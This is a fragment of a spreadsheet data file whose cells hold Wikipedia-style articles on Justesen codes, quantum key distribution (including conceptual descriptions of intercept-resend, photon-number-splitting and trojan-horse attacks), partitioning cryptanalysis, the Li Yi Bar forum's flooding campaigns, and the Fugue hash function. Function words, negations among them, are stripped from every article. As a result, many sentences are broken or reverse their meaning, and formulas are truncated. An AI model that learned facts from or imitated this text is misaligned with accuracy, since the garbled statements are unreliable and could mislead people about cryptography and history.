{1}{2}}-\varepsilon \right)\cdot 2k.} lemma. linear codes {\displaystyle c_{in}^{\alpha _{1}}} {\displaystyle c_{in}^{\alpha _{2}}} {\displaystyle \alpha _{1},\alpha _{2}\in \mathbb _{q^{k}}} distinct non-zero, share non-zero codeword.proof. suppose exist distinct non-zero elements {\displaystyle \alpha _{1},\alpha _{2}\in \mathbb _{q^{k}}} linear codes {\displaystyle c_{in}^{\alpha _{1}}} {\displaystyle c_{in}^{\alpha _{2}}} contain non-zero codeword {\displaystyle since {\displaystyle y\in c_{in}^{\alpha _{1}},y=(y_{1},\alpha _{1}y_{1})} {\displaystyle y_{1}\in \mathbb _{q}^{k}} similarly {\displaystyle y=(y_{2},\alpha _{2}y_{2})} {\displaystyle y_{2}\in \mathbb _{q}^{k}.} moreover since {\displaystyle non-zero {\displaystyle y_{1},y_{2}\neq therefore {\displaystyle (y_{1},\alpha _{1}y_{1})=(y_{2},\alpha _{2}y_{2})} {\displaystyle y_{1}=y_{2}\neq {\displaystyle \alpha _{1}y_{1}=\alpha _{2}y_{2}.} this implies {\displaystyle \alpha _{1}=\alpha _{2}} contradiction.any linear code distance {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot codeword weight {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} lemma implies least {\displaystyle |p|} different {\displaystyle {\displaystyle wt(y)&lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot (one codeword {\displaystyle linear code). here {\displaystyle wt(y)} denotes weight codeword {\displaystyle number non-zero positions {\displaystyle denote {\displaystyle s=\left\{y\ wt(y)&lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k\right\}} then: volume hamming ball radius large enough {\displaystyle {\begin{aligned}|p|&amp;\leqslant |s|\\&amp;\leqslant {\text{vol}}_{q}\left(h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k,2k\right)&amp;&amp;{\text{vol}}_{q}(r,n){\text{ volume hamming ball radius }}r{\text{ }}[q]^{n}\\&amp;\leqslant q^{h_{q}\left(h_{q}^{-1}\left({\frac {1}{2}}-\varepsilon \right)\right)\cdot 2k}&amp;&amp;{\text{vol}}_{q}(pn,n)\leqslant q^{h_{q}(p)n}\\&amp;=q^{\left({\frac {1}{2}}-\varepsilon \right)\cdot 2k}\\&amp;=q^{k(1-2\varepsilon )}\\&amp;&lt;\varepsilon (q^{k}-1)&amp;&amp;{\text{ }}k{\text{ large enough }}\\&amp;=\varepsilon n\end{aligned}}} {\displaystyle |p|&lt;\varepsilon therefore linear codes relative distance {\displaystyle \geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot least {\displaystyle n-\varepsilon n=(1-\varepsilon elements. also justesen code linear code hamming bound references massey, james (1963), threshold decoding, tech. report 410, cambridge, mass.: massachusetts institute technology, research laboratory electronics, hdl:1721.1/4415, 0154763. justesen, jørn (1972), class constructive asymptotically good algebraic codes", institute electrical electronics engineers. transactions information theory, it-18: 652–656, doi:10.1109/tit.1972.1054893, 0384313. external links lecture justesen code. coding theory's course. prof. atri rudra. lecture bounds volume hamming ball. coding theory's course. prof. atri rudra. justesen (1972). class constructive asymptotically good algebraic codes". ieee trans. inf. theory. 652–656. doi:10.1109/tit.1972.1054893. coding theory's notes: gilbert-varshamov bound. venkatesan guruswami</t>
  </si>
  <si>
    <t>Quantum key distribution</t>
  </si>
  <si>
    <t>quantum distribution (qkd) secure communication method implements cryptographic protocol involving components quantum mechanics. enables parties produce shared random secret known them, used encrypt decrypt messages. often incorrectly called quantum cryptography, best-known example quantum cryptographic task. important unique property quantum distribution ability communicating users detect presence third party trying gain knowledge key. this results fundamental aspect quantum mechanics: process measuring quantum system general disturbs system. third party trying eavesdrop must measure thus introducing detectable anomalies. using quantum superpositions quantum entanglement transmitting information quantum states, communication system implemented detects eavesdropping. level eavesdropping certain threshold, produced guaranteed secure (i.e., eavesdropper information it), otherwise secure possible communication aborted. security encryption uses quantum distribution relies foundations quantum mechanics, contrast traditional public cryptography, relies computational difficulty certain mathematical functions, cannot provide mathematical proof actual complexity reversing one-way functions used. provable security based information theory, forward secrecy. main drawback quantum distribution usually relies authenticated classical channel communications. modern cryptography, authenticated classical channel means either already exchanged symmetric sufficient length public keys sufficient security level. with information already available, practice achieve authenticated sufficiently secure communications without using qkd, using galois/counter mode advanced encryption standard. thus work stream cipher many times cost. quantum distribution used produce distribute key, transmit message data. this used chosen encryption algorithm encrypt (and decrypt) message, transmitted standard communication channel. algorithm commonly associated one-time pad, provably secure used secret, random key. real-world situations, often also used encryption using symmetric algorithms like advanced encryption standard algorithm. quantum exchange quantum communication involves encoding information quantum states, qubits, opposed classical communication's bits. usually, photons used quantum states. quantum distribution exploits certain properties quantum states ensure security. there several different approaches quantum distribution, divided main categories depending property exploit. prepare measure protocols contrast classical physics, measurement integral part quantum mechanics. general, measuring unknown quantum state changes state way. this consequence quantum indeterminacy exploited order detect eavesdropping communication (which necessarily involves measurement) and, importantly, calculate amount information intercepted.entanglement based protocols quantum states more) separate objects become linked together must described combined quantum state, individual objects. this known entanglement means that, example, performing measurement object affects other. entangled pair objects shared parties, anyone intercepting either object alters overall system, revealing presence third party (and amount information gained).these approaches divided three families protocols: discrete variable, continuous variable distributed phase reference coding. discrete variable protocols first invented, remain widely implemented. families mainly concerned overcoming practical limitations experiments. protocols described discrete variable coding. bb84 protocol: charles bennett gilles brassard (1984) this protocol, known bb84 inventors year publication, originally described using photon polarization states transmit information. however, pairs conjugate states used protocol, many optical-fibre-based implementations described bb84 phase encoded states. sender (traditionally referred alice) receiver (bob) connected quantum communication channel allows quantum states transmitted. case photons channel generally either optical fibre simply free space. addition communicate public classical channel, example using broadcast radio internet. protocol designed assumption eavesdropper (referred eve) interfere quantum channel, classical channel needs authenticated.the security protocol comes encoding information non-orthogonal states. quantum indeterminacy means states cannot general measured without disturbing original state (see no-cloning theorem). bb84 uses pairs states, pair conjugate pair, states within pair orthogonal other. pairs orthogonal states referred basis. usual polarization state pairs used either rectilinear basis vertical (0°) horizontal (90°), diagonal basis 135° circular basis left- right-handedness. bases conjugate other, used protocol. below rectilinear diagonal bases used. first step bb84 quantum transmission. alice creates random randomly selects bases (rectilinear diagonal case) transmit prepares photon polarization state depending value basis, shown adjacent table. example encoded rectilinear basis vertical polarization state, encoded diagonal basis 135° state. alice transmits single photon state specified bob, using quantum channel. this process repeated random stage, alice recording state, basis time photon sent. according quantum mechanics (particularly quantum indeterminacy), possible measurement distinguishes different polarization states, orthogonal. possible measurement orthogonal states orthonormal basis). example, measuring rectilinear basis gives result horizontal vertical. photon created horizontal vertical rectilinear eigenstate) measures correct state, created 135° (diagonal eigenstates) rectilinear measurement instead returns either horizontal vertical random. furthermore, measurement photon polarized state measured (horizontal vertical), information initial polarization lost. know basis photons encoded select basis random measure either rectilinear diagonal. photon receives, recording time, measurement basis used measurement result. after measured photons, communicates alice public classical channel. alice broadcasts basis photon sent basis measured they discard photon measurements (bits) used different basis, half average, leaving half bits shared key. check presence eavesdropper, alice compare predetermined subset remaining strings. third party (usually referred eve, "eavesdropper") gained information photons' polarization, introduces errors bob's measurements. other environmental conditions cause errors similar fashion. {\displaystyle bits differ abort again, possibly different quantum channel, security cannot guaranteed. {\displaystyle chosen number bits known less this, privacy amplification used reduce eve's knowledge arbitrarily small amount cost reducing length key. protocol: artur ekert (1991) artur ekert's scheme uses entangled pairs photons. these created alice, bob, source separate them, including eavesdropper eve. photons distributed alice photon pair. scheme relies properties entanglement. first, entangled states perfectly correlated sense alice measure whether particles vertical horizontal polarizations, always answer 100% probability. true measure pair complementary (orthogonal) polarizations. this necessitates distant parties exact directionality synchronization. however, particular results completely random; impossible alice predict (and thus bob) vertical polarization horizontal polarization. second, attempt eavesdropping destroys correlations alice detect. similarly bb84, protocol involves private measurement protocol detecting presence eve. measurement stage involves alice measuring photon receives using basis {\displaystyle z_{0},z_{\frac {\pi }{8}},z_{\frac {\pi }{4}}} chooses {\displaystyle z_{0},z_{\frac {\pi }{8}},z_{-{\frac {\pi }{8}}}} {\displaystyle z_{\theta {\displaystyle \{|{\uparrow }\rangle ,\;|{\rightarrow }\rangle basis rotated {\displaystyle \theta they keep series basis choices private measurements completed. groups photons made: first consists photons measured using basis alice second contains photons. detect eavesdropping, compute test statistic {\displaystyle using correlation coefficients alice's bases bob's similar shown bell test experiments. maximally entangled photons would result {\displaystyle |s|=2{\sqrt {2}}} case, alice conclude introduced local realism system, violating bell's theorem. protocol successful, first group used generate keys since photons completely anti-aligned alice bob. information reconciliation privacy amplification quantum distribution protocols described provide alice nearly identical shared keys, also estimate discrepancy keys. these differences caused eavesdropping, also imperfections transmission line detectors. impossible distinguish types errors, guaranteed security requires assumption errors eavesdropping. provided error rate keys lower certain threshold (27.6% 2002), steps performed first remove erroneous bits reduce eve's knowledge arbitrary small value. these steps known information reconciliation privacy amplification respectively, first described 1992.information reconciliation form error correction carried alice bob's keys, order ensure keys identical. conducted public channel vital minimise information sent key, read eve. common protocol used information reconciliation cascade protocol, proposed 1994. this operates several rounds, keys divided blocks round parity blocks compared. difference parity found binary search performed find correct error. error found block previous round correct parity another error must contained block; error found corrected before. this process repeated recursively, source cascade name. after blocks compared, alice reorder keys random way, round begins. multiple rounds alice identical keys high probability; however, additional information parity information exchanged. however, coding theory point view information reconciliation essentially source coding side information, consequence coding scheme works problem used information reconciliation. lately turbocodes, ldpc codes polar codes used purpose improving efficiency cascade protocol. privacy amplification method reducing (and effectively eliminating) eve's partial information alice bob's key. this partial information could gained eavesdropping quantum channel transmission (thus introducing detectable errors), public channel information reconciliation (where assumed gains possible parity information). privacy amplification uses alice bob's produce new, shorter key, negligible information key. this done using universal hash function, chosen random publicly known functions, takes input binary string length equal outputs binary string chosen shorter length. amount shortened calculated, based much information could gained (which known errors would introduce), order reduce probability knowledge value. implementations experimental 2008, exchange secure keys mbit/s (over optical fibre) kbit/s (over fibre), achieved collaboration university cambridge toshiba using bb84 protocol decoy state pulses.in 2007, alamos national laboratory/nist achieved quantum distribution 148.7 optic fibre using bb84 protocol. significantly, distance long enough almost spans found today's fibre networks. european collaboration achieved free space canary islands using entangled photons (the ekert scheme) 2006, using bb84 enhanced decoy states 2007.as august 2015 longest distance optical fiber (307 achieved university geneva corning inc. experiment, secret rate 12.7 kbit/s generated, making highest rate system distances 2016 team corning various institutions china achieved distance rate slow practical.in june 2017, physicists thomas jennewein institute quantum computing university waterloo waterloo, canada achieved first demonstration quantum distribution ground transmitter moving aircraft. they reported optical links distances 3–10 generated secure keys kilobytes length.also june 2017, part quantum experiments space scale project, chinese physicists jianwei university science technology china measured entangled photons distance 1203 ground stations, laying groundwork future intercontinental quantum distribution experiments. photons sent ground station satellite named micius back another ground station, "observed survival two-photon entanglement violation bell inequality 2.37 0.09 strict einstein locality conditions" along "summed length varying 1600 2400 kilometers." later year bb84 successfully implemented satellite links micius ground stations china austria. keys combined result used transmit images video beijing, china, vienna, austria.in august 2017, group shanghai jiaotong university experimentally demonstrate polarization quantum states including general qubits single photon entangled states survive well travelling seawater, representing first step towards underwater quantum communication. 2019 group lead hong peking university beijing university posts telecommunications reported field tests continuous-variable system commercial fiber networks xi'an guangzhou distances 30.02 (12.48 49.85 (11.62 respectively.in december 2020, indian defence research development organisation tested laboratories hyderabad facility. setup also demonstrated validation detection third party trying gain knowledge communication. quantum based security eavesdropping validated deployed system (7.5 range attenuation fibre optic channel. continuous wave laser source used generate photons without depolarization effect timing accuracy employed setup order picoseconds. single photon avalanche detector (spad) recorded arrival photons rate achieved range kbps quantum error rate.in march 2021, indian space research organisation also demonstrated free-space quantum communication distance meters. free-space demonstrated space applications centre (sac), ahmedabad, line-of-sight buildings within campus video conferencing quantum-key encrypted signals. experiment utilised navic receiver time synchronization transmitter receiver modules. later january 2022, indian scientists able successfully create atmospheric channel exchange crypted messages images. after demonstrating quantum communication ground stations, india plans develop satellite based quantum communication (sbqc). commercial there currently companies offering commercial quantum distribution systems around world; quantique (geneva), magiq technologies, inc. (new york), labs (bengaluru, india), quintessencelabs (australia), qrate (russia) sequrenet (paris). several companies also active research programs, including kets quantum security (uk), toshiba, ibm, mitsubishi, (see external links direct research links). 2004, world's first bank transfer using quantum distribution carried vienna, austria. quantum encryption technology provided swiss company quantique used swiss canton (state) geneva transmit ballot results capital national election occurring october 2007. 2013, battelle memorial institute installed system built quantique main campus columbus, ohio manufacturing facility nearby dublin. field tests tokyo network underway time. quantum distribution networks darpa darpa quantum network, 10-node quantum distribution network, continuously four years, hours day, 2004 2007 massachusetts united states. developed technologies, harvard university, boston university, collaboration research, national institute standards technology, qinetiq. supported standards-based internet computer network protected quantum distribution. secoqc world's first computer network protected quantum distribution implemented october 2008, scientific conference vienna. name network secoqc (secure communication based quantum cryptography) funded project. network used standard fibre optic cable interconnect locations across vienna town poelten located west. swissquantum quantique successfully completed longest running project testing quantum distribution (qkd) field environment. main goal swissquantum network project installed geneva metropolitan area march 2009, validate reliability robustness continuous operation long time period field environment. quantum layer operated nearly years project shut january 2011 shortly initially planned duration test. chinese networks 2009, hierarchical quantum network demonstrated wuhu, china. hierarchical network consisted backbone network four nodes connecting number subnets. backbone nodes connected optical switching quantum router. nodes within subnet also connected optical switch, connected backbone network trusted relay.launched august 2016, quess space mission created international channel china institute quantum optics quantum information vienna, austria ground distance 7,500 (4,700 mi), enabling first intercontinental secure quantum video call. october 2017, 2,000-km fiber line operational beijing, jinan, hefei shanghai. together constitute world's first space-ground quantum network. micius/quess satellites expected, allowing european–asian quantum-encrypted network 2020, global network 2030. tokyo network tokyo network inaugurated first uqcc2010 conference. network involves international collaboration partners; nec, mitsubishi electric, nict japan, participation europe toshiba research europe ltd. (uk), quantique (switzerland) vienna (austria). "all vienna" represented researchers austrian institute technology (ait), institute quantum optics quantum information (iqoqi) university vienna. alamos national laboratory hub-and-spoke network operated alamos national laboratory since 2011. messages routed hub. system equips node network quantum transmitters—i.e., lasers—but expensive bulky photon detectors. only receives quantum messages. communicate, node sends one-time hub, uses communicate securely classical link. route message another node using another time second node. entire network secure central secure. individual nodes require little laser: prototype nodes around size matches. attacks security proofs intercept resend simplest type possible attack intercept-resend attack, measures quantum states (photons) sent alice sends replacement states bob, prepared state measures. bb84 protocol, produces errors alice share. knowledge basis state sent alice encoded guess basis measure bob. chooses correctly, measures correct photon polarization state sent alice, resends correct state bob. however, chooses incorrectly, state measures random, state sent cannot state sent alice. measures state basis alice sent, gets random result—as sent state opposite basis—with chance erroneous result (instead correct result would without presence eve). table shows example type attack. probability chooses incorrect basis (assuming alice chooses randomly), measures intercepted photon basis alice sent gets random result, i.e., incorrect result probability 50%. probability intercepted photon generates error string 25%. alice publicly compare {\displaystyle bits (thus discarding bits, longer secret) probability find disagreement identify presence {\displaystyle p_{d}=1-\left({\frac {3}{4}}\right)^{n}} detect eavesdropper probability 0.999999999 {\displaystyle p_{d}=0.999999999} alice need compare {\displaystyle n=72} bits. man-in-the-middle attack quantum distribution vulnerable man-in-the-middle attack used without authentication extent classical protocol, since known principle quantum mechanics distinguish friend foe. classical case, alice cannot authenticate establish secure connection without means verifying other's identities (such initial shared secret). alice initial shared secret unconditionally secure authentication scheme (such carter-wegman,) along quantum distribution exponentially expand key, using small amount authenticate next session. several methods create initial shared secret proposed, example using party chaos theory. nevertheless, "almost strongly universal" family hash functions used unconditionally secure authentication. photon number splitting attack bb84 protocol alice sends quantum states using single photons. practice many implementations laser pulses attenuated level send quantum states. these laser pulses contain small number photons, example photons pulse, distributed according poisson distribution. this means pulses actually contain photons pulse sent), pulses contain photon (which desired) pulses contain photons. pulse contains photon, split extra photons transmit remaining single photon bob. this basis photon number splitting attack, stores extra photons quantum memory detects remaining single photon alice reveals encoding basis. measure photons correct basis obtain information without introducing detectable errors. even possibility attack secure still generated, shown gllp security proof; however, much higher amount privacy amplification needed reducing secure rate significantly (with rate scales {\displaystyle t^{2}} compared {\displaystyle single photon sources, {\displaystyle transmittance quantum channel). there several solutions problem. obvious true single photon source instead attenuated laser. while sources still developmental stage carried successfully them. however, current sources operate efficiency frequency rates transmission distances limited. another solution modify bb84 protocol, done example sarg04 protocol, secure rate scales {\displaystyle t^{3/2}} promising solution decoy states alice randomly sends laser pulses lower average photon number. these decoy states used detect attack, tell pulses signal decoy. using idea secure rate scales {\displaystyle single photon source. this idea implemented successfully first university toronto, several follow-up experiments, allowing high rates secure known attacks. denial service because currently dedicated fibre optic line line sight free space) required points linked quantum distribution, denial service attack mounted simply cutting blocking line. this motivations development quantum distribution networks, would route communication alternate links case disruption. trojan-horse attacks quantum distribution system probed sending bright light quantum channel analyzing back-reflections trojan-horse attack. recent research study shown discerns bob's secret basis choice higher probability, breaching security system. security proofs assumed unlimited resources, example classical quantum computing power, many attacks possible. bb84 proven secure attacks allowed quantum mechanics, sending information using ideal photon source ever emits single photon time, also using practical photon sources sometimes emit multiphoton pulses. these proofs unconditionally secure sense conditions imposed resources available eavesdropper; however, conditions required: cannot physically access alice bob's encoding decoding devices. random number generators used alice must trusted truly random (for example quantum random number generator). classical communication channel must authenticated using unconditionally secure authentication scheme. message must encrypted using one-time like scheme quantum hacking hacking attacks target vulnerabilities operation protocol deficiencies components physical devices used construction system. equipment used quantum distribution tampered with, could made generate keys secure using random number generator attack. another common class attacks trojan horse attack require physical access endpoints: rather attempt read alice bob's single photons, sends large pulse light back alice transmitted photons. alice's equipment reflects eve's light, revealing state alice's basis (e.g., polarizer). this attack detected, e.g. using classical detector check non-legitimate signals (i.e. light eve) entering alice's system. also conjectured hacking attacks similarly defeated modifying implementation, though formal proof. several attacks including faked-state attacks, phase remapping attacks, time-shift attacks known. time-shift attack even demonstrated commercial quantum cryptosystem. this first demonstration quantum hacking non-homemade quantum distribution system. later phase-remapping attack also demonstrated specially configured, research oriented open system (made provided swiss company quantique quantum hacking program). first 'intercept-and-resend' attacks widely used implementation commercial systems. this work widely reported media.the first attack claimed able eavesdrop whole without leaving trace demonstrated 2010. experimentally shown single-photon detectors commercial devices could fully remote-controlled using specially tailored bright illumination. spree publications thereafter, collaboration norwegian university science technology norway planck institute science light germany, demonstrated several methods successfully eavesdrop commercial systems based weaknesses avalanche photodiodes (apds) operating gated mode. this sparked research approaches securing communications networks. counterfactual quantum distribution task distributing secret could achieved even particle secret information, e.g. polarization, encoded) traverse quantum channel using protocol developed tae-gon noh. here alice generates photon which, taking measurement later, exists superposition paths simultaneously. path stays inside alice's secure device path goes bob. rejecting photons receives accepting ones receive, alice secure channel, i.e. eve's attempts read counterfactual photons would still detected. this protocol uses quantum phenomenon whereby possibility photon sent effect even sent. so-called interaction-free measurement also uses quantum effect, example bomb testing problem, whereby experimenter conceptually determine bombs duds without setting off, except counterfactual sense. history quantum cryptography proposed first stephen wiesner, columbia university york, who, early 1970s, introduced concept quantum conjugate coding. seminal paper titled "conjugate coding" rejected ieee information theory eventually published 1983 sigact news (15:1 78–88, 1983). paper showed store transmit messages encoding "conjugate observables", linear circular polarization light, either, both, received decoded. illustrated idea design unforgeable bank notes. decade later, building upon work, charles bennett, thomas watson research center, gilles brassard, university montreal, proposed method secure communication based wiesner's "conjugate observables". 1990, artur ekert, student wolfson college, university oxford, developed different approach quantum distribution based quantum entanglement. future current commercial systems aimed mainly governments corporations high security requirements. distribution courier typically used cases, traditional distribution schemes believed offer enough guarantee. this advantage intrinsically distance limited, despite long travel times transfer rate high availability large capacity portable storage devices. major difference quantum distribution ability detect interception key, whereas courier security cannot proven tested. (quantum distribution) systems also advantage automatic, greater reliability lower operating costs secure human courier network. kak's three-stage protocol proposed method secure communication entirely quantum unlike quantum distribution cryptographic transformation uses classical algorithms.factors preventing wide adoption quantum distribution outside high security areas include cost equipment, lack demonstrated threat existing exchange protocols. however, optic fibre networks already present many countries infrastructure place widespread use. industry specification group (isg) european telecommunications standards institute (etsi) address standardisation issues quantum cryptography.european metrology institutes, context dedicated projects, developing measurements required characterise components systems. toshiba europe awarded prestigious institute physics award business innovation. this recognises toshiba’s pioneering technology developed decades research, protecting communication infrastructure present future cyber-threats, commercialising uk-manufactured products pave road quantum internet. institute physics (iop) professional body learned society physics, leading body practising physicists, ireland. with rich history supporting business innovation growth, committed working ‘physics-based’ businesses, companies apply employ physics physicists. toshiba also took semi grand prix award solutions category minister economy, trade industry award ceatec award 2021, prestigious awards presented ceatec, japan’s premier electronics industry trade show. deprecation quantum distributions governmental institutions some organizations recommended using "post-quantum cryptography quantum-resistant cryptography)" alternative problems raises practical use. example, national security agency usa, european union agency cybersecurity (enisa), national cyber security centre (united kingdom), french secretariat defense security (anssi) recommend (read bibliography details).for example, u.s. national security agency addresses five issues: quantum distribution partial solution. generates keying material encryption algorithm provides confidentiality. such keying material could also used symmetric cryptographic algorithms provide integrity authentication cryptographic assurance original transmission comes desired entity (i.e. entity source authentication). provide means authenticate transmission source. therefore, source authentication requires asymmetric cryptography preplaced keys provide authentication. moreover, confidentiality services offers provided quantum-resistant cryptography, typically less expensive better understood risk profile. quantum distribution requires special purpose equipment. based physical properties, security derives unique physical layer communications. this requires users lease dedicated fiber connections physically manage free-space transmitters. cannot implemented software service network, cannot easily integrated existing network equipment. since hardware-based also lacks flexibility upgrades security patches. quantum distribution increases infrastructure costs insider threat risks. networks frequently necessitate trusted relays, entailing additional cost secure facilities additional security risk insider threats. this eliminates many cases consideration. securing validating quantum distribution significant challenge. actual security provided system theoretical unconditional security laws physics modeled often suggested), rather limited security achieved hardware engineering designs. tolerance error cryptographic security, however, many orders magnitude smaller physical engineering scenarios making difficult validate. specific hardware used perform introduce vulnerabilities, resulting several well-publicized attacks commercial systems. quantum distribution increases risk denial service. sensitivity eavesdropper theoretical basis security claims also shows denial service significant risk qkd.in response problem above, attempts deliver authentication keys using post-quantum cryptography quantum-resistant cryptography) proposed worldwide. hand, quantum-resistant cryptography cryptography belonging class computational security. 2015, research result already published "sufficient care must taken implementation achieve information-theoretic security system whole authentication keys information-theoretic secure used" (when authentication information-theoretic secure authentication information-theoretically secure, attacker break bring classical quantum communications control relay launch man-in-the-middle attack). ericsson, private company, also cites points problems presents report able support zero trust security model, recent trend network security technology. also list quantum distribution protocols quantum computing quantum cryptography quantum information science quantum network references external links general reviewquantum computing scientific american magazine (january 2005 issue) best-kept secrets non-technical article quantum cryptography physics world magazine (march 2007 issue) non-technical article current state future quantum communication scarani, valerio; bechmann-pasquinucci, helle; cerf, nicolas dušek, miloslav; lütkenhaus, norbert; peev, momtchil (2009). "the security practical quantum distribution". rev. mod. phys. (3): 1301–1350. arxiv:0802.4155. bibcode:2009rvmp...81.1301s. doi:10.1103/revmodphys.81.1301. s2cid 15873250. nguyen, kim-chi; gilles assche; cerf, nicolas (2007). "quantum cryptography: from theory practice". arxiv:quant-ph/0702202. secoqc white paper quantum distribution cryptography european project create large scale quantum cryptography network, includes discussion current approaches comparison classical cryptography future cryptography 2003 tomasz grabowski arda quantum cryptography roadmap lectures institut henri poincaré (slides videos) interactive quantum cryptography demonstration experiment s</t>
  </si>
  <si>
    <t>Partitioning cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, partitioning cryptanalysis form cryptanalysis block ciphers. developed carlo harpes 1995, attack generalization linear cryptanalysis. harpes originally replaced sums (affine transformations) linear cryptanalysis general balanced boolean functions. demonstrated cipher exhibits resistance ordinary linear cryptanalysis susceptible sort partitioning cryptanalysis. full generality, partitioning cryptanalysis works dividing sets possible plaintexts ciphertexts efficiently-computable partitions distribution ciphertexts significantly non-uniform plaintexts chosen uniformly given block partition. partitioning cryptanalysis shown effective linear cryptanalysis variants crypton. specific partitioning attack called cryptanalysis uses congruence classes modulo integer partitions. references carlo harpes, gerard kramer, james massey (may 1995). generalization linear cryptanalysis applicability matsui's piling-up lemma (pdf/postscript). advances cryptology eurocrypt '95. saint-malo: springer-verlag. 24–38. retrieved september 2007.{{cite conference}}: maint: multiple names: authors list (link) thomas jakobsen (1995). "security against generalized linear cryptanalysis partitioning cryptanalysis" (pdf/postscript). retrieved september 2007. {{cite journal}}: cite journal requires |journal= (help) jakobsen; harpes (1996). bounds non-uniformity measures generalized linear cryptanalysis partitioning cryptanalysis (pdf/postscript). pragocrypt '96. prague: czech technical university publishing house. 467–479. retrieved september 2007. harpes; massey (january 1997). partitioning cryptanalysis (pdf/postscript). international workshop fast software encryption (fse '97). haifa: springer-verlag. 13–27. retrieved september 2007. marine minier, henri gilbert (april 2000). stochastic cryptanalysis crypton (pdf). international workshop fast software encryption (fse 2000). york city: springer-verlag. 121–133. retrieved september 2007. thomas baignères, pascal junod, serge vaudenay (december 2004). beyond linear cryptanalysis? (pdf). advances cryptology asiacrypt 2004. jeju island: springer-verlag. 432–450. retrieved september 2007.{{cite conference}}: maint: multiple names: authors list (link) gaëtan leurent (october 2015). differential linear cryptanalysis partitioning (pdf). cryptology eprint archive. retrieved october 2015.</t>
  </si>
  <si>
    <t>Li Yi Bar</t>
  </si>
  <si>
    <t>(chinese: 李毅吧; pinyin: lit. subforum', popular name bar, also etc) subforum baidu tieba forum. this subforum opened ridiculing this subforum well-known large number followers, often flood internet forums subforums. history open year 2004, originally ridiculing soccer player nickname imperator great (chinese: 李毅大帝; pinyin: dì), (chinese: pinyin: short, nicknamed bar"(chinese: pinyin: bā), "d8", etc, also nicknamed "the louvre baidu" (chinese: 百度卢浮宫; pinyin: gōng). because subforum large number followers followers often flood forums, gets title "whenever sends expeditionary force, even blade grass alive" (chinese: 帝吧出征，寸草不生; pinyin: zhēng, shēng). june flood event year 2007, subforum yuchun conflict subforum bar, caused owner blocked. then, followers organized message flood yuchun bar. 18:20 june 2007, started flooding, owner yuchun deleted spams continuously. 20:20, flood fast posts second, deletion fast enough remove spams. consequently, yuchun finally conquered. july flood event july 2013 july 2013, large flood baidu tieba. july 2013, tencent weibo user named mengying insulted famous soccer players cristiano ronaldo, lionel messi, etc, showed respect soccer, angered many chinese fans real madrid barcelona, escalates conflicts therefore angry fans decided flood subforums baidu tieba forum 8:00 because larger larger population joined flood event, inflamed anger chinese fans korean stars, resulted participation followers bar. evening july 2013, flood went climax. billions spams posted dozens subforums baidu tieba. 2016 chinese meme facebook january 2016, sina weibo user organized flood team bar, whose mission flood tsai ing-wen's facebook pages theme anti-taiwan independence. 19:00 january 2016, flood started. facebook pages tsai ing-wen, apple daily, news seriously flooded therefore comments order stop message flood attack. during event, facebook pages flooded billions meme pictures stickers, therefore called meme facebook. 2018 flood facebook pages ministry foreign affairs sweden september 2018, followers organized flood team again, order flood facebook pages swedish ministry foreign affairs, facebook pages swedish televisions, facebook pages jesper rönndahl. those spammers sent myriads comments swear words facebook pages. there thousand comments jesper rönndahl's facebook pages, deleted period time. counteractions 2019 hong kong protests july 2019, join forces hong kong government police force anti-extradition bill protest, followers claimed flood initiated july 2019 20:00. their targets could include facebook lihkg. however, operation started advance july 2019, facebook pages civil human rights front hong kong national front flooded. very soon, core members doxed. day, admin called operation prevent disturbing normality life hong kong citizens." restrictions posts because myriads followers exist even accounts send pornographic posts, many posts require captchas. also chinese nationalism references</t>
  </si>
  <si>
    <t>Fugue (hash function)</t>
  </si>
  <si>
    <t>fugue cryptographic hash function submitted nist hash function competition. designed shai halevi, william hall, charanjit jutla. fugue takes arbitrary-length message compresses fixed bit-length (either 224, 256, bits). hash functions different output lengths called fugue-224, fugue-256, fugue-384 fugue-512. authors also describe parametrized version fugue. weak version fugue-256 also described using parameterized version. selling point fugue authors' claimed proof wide range current attack strategies based differential cryptanalysis cannot efficient fugue. also claimed competitive nist hash function sha-256 software hardware efficiency, achieving 36.2 cycles byte intel family model xeon 5150, cycles byte intel core processor t7700. core2 processors, e.g. t9400, fugue-256 runs cycles byte using sse4.1 instructions. newer westmere architectures nm), e.g. core fugue-256 runs cycles/byte. fugue's design starts hash function grindahl, like grindahl uses s-box aes, replaces column mixing matrix 16×16 "super-mix" operation greatly improves diffusion. "super-mix" operation however, slightly computationally expensive implement mixing strategy. supermix variants fugue work state represented matrix unsigned bytes, whereas variants work byte matrix. operations performed in-place state. core algorithm, known "supermix transformation", takes matrix input returns matrix. input supermix simply first four columns current 30-column state output used replace state area (i.e. supermix affects matrix head state). supermix function defined supermix {\displaystyle {\text{supermix}}(u)={\text{rol}}\left(m\cdot u+{\begin{pmatrix}\sum _{j\neq 0}u_{j}^{i}&amp;0&amp;0&amp;0\\0&amp;\sum _{j\neq 1}u_{j}^{i}&amp;0&amp;0\\0&amp;0&amp;\sum _{j\neq 2}u_{j}^{i}&amp;0\\0&amp;0&amp;0&amp;\sum _{j\neq 3}u_{j}^{i}\end{pmatrix}}\cdot m^{t}\right)} where: {\displaystyle m={\begin{pmatrix}1&amp;4&amp;7&amp;1\\1&amp;1&amp;4&amp;7\\7&amp;1&amp;1&amp;4\\4&amp;7&amp;1&amp;1\end{pmatrix}}} {\displaystyle matrix bytes (i.e. matrix s-box substitution input); {\displaystyle m^{t}} transpose m.the transformation {\displaystyle rol} takes matrix, rotates {\displaystyle left {\displaystyle bytes, i.e. {\displaystyle {\text{rol}}(w)_{j}^{i}=w_{j-i{\pmod {4}}}^{i}} fugue fugue tweak original fugue, runs twice speed fugue 256-bit output. designers claim advanced proofs resistance differential collision attacks improved version. complete specification found link below. external links hash function fugue</t>
  </si>
  <si>
    <t>Elliptic curve only hash</t>
  </si>
  <si>
